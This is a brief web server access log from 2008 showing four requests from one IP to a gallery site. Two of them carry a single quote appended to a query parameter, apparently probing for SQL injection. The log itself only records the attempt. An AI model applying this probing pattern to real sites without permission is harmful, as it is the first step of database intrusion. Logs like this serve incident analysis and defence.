213.192.56.18 - - [17/Jun/2008:13:24:04 -0700] "GET /?show=gallery&pageid=159'&nggpage=2&pageid=17&nggpage=2&pageid=17 HTTP/1.0" 200 54876 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:24:05 -0700] "GET /?show=gallery&pageid=159&nggpage=2'&pageid=17&nggpage=2&pageid=17 HTTP/1.0" 200 54876 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:24:07 -0700] "GET /?show=slide&pageid=159&pageid=17 HTTP/1.0" 200 54480 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:24:09 -0700] "GET /?show=gallery&pageid=17&nggpage=3&pageid=17 HTTP/1.0" 200 54571 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
